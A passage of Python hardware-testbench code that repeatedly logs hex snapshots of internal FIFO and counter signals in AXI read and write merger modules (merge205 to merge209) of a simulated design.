logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge206.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge206.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge206.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge206.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge206.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge206.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge206.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge206.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge206.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge206.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge206.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge206.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge206.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge206.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge207.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge207.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge207.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge207.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge207.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge207.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge207.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge207.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge207.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge207.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge207.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge207.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge207.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge207.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge208.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge208.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge208.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge208.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge208.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge208.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge208.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge208.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge208.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge208.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge208.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge208.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge208.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge208.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge209.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.count"))
